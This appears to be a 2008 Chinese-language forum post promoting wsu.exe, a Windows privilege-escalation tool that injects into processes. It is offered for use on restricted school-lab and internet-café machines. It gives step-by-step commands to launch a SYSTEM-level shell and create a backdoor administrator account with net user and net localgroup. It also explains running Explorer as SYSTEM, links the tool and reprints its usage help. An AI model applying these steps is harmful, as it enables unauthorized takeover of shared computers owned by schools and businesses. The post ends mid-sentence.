wsu.exe的作用是在Windows NT4/2000/xp/2003系统下以任何权限和身份执行程序
wsu.exe通过插入其他进程来获取权限 [color=#0000FF]很好 很强大[/color]
在一些默认登录的是受限制的用户的机器(如学校机房、网吧、特殊环境。。。)上效果超级好
例如在我们语音教室默认就是一个User权限的Student帐号
可以用wsu.exe轻松获取高权限 具体操作如下
1、(假设把wsu.exe放在D盘)先打开一个命令提示符窗口,转到D盘下输入wsu cmd.exe (即D:\>wsu cmd.exe 回车)
2、在新打开的命令提示符窗口中执行下列命令:
(1)net user Holmesian 123 /add
(2)net localgroup administrators Holmesian /add
[color=#32CD32]这样就建立了一个用户名为Holmesian密码为123的管理员帐号[/color]
3、注销当前的受限用户,重新以Holmesian为用户名,123为密码,登录系统,这样便有管理员权限,方便多了。。。
对比截图:
1、使用提权工具启动注册表编辑器,有查看、修改SAM子键及其键值的权限。
2、正常方式启动,无权查看、修改SAM的子键及其键值!
wsu.exe下载
[file][/file]
WSU自带的帮助:
wsu 1.0 for Windows NT4/2000/xp/2003
Usage : wsu [-p [进程] | -u 用户名 | -f 用户名] [-o] [-i] 程序
[SU Type]
-u 用户名 -- 以指定的用户运行程序 (需要提供用户密码)
-f 帐号名 -- 以指定的帐户运行程序 (不需要提供帐户密码)
-p [进程] -- 以指定的进程PID或进程名运行程序(省略时默认为lsass.exe)
command -- command line to run, "" to enclose if with blank
-o -- run the console command in the Old console
-i -- Force to interactive with desktop, default same as the wsu process
-? -- show this.
Example:
wsu regedit, will start regedit with SYSTEM context.
wsu -p csrss.exe -o whoami, run whoami with the context of csrss.exe
wsu -u guest "cmd /k prompt guest@$p$g", start a new shell for GUEST.
wsu -f users "cmd /k whoami /all", start a new shell as group USERS.
还需要注意一点,如果想获得比管理员权限还高的Explorer,需要先用任务管理器结束现有的Explorer.exe进程,然后再用这个软件以 SYSTEM权限启动Explorer,这样的话,你打开的所有程序,都会拥有最高的系统权限,甚至可以直接打开硬盘中NTFS分区里边的System Volume Information文件夹!!!
不过要小心的是……
2008-05-05 23:22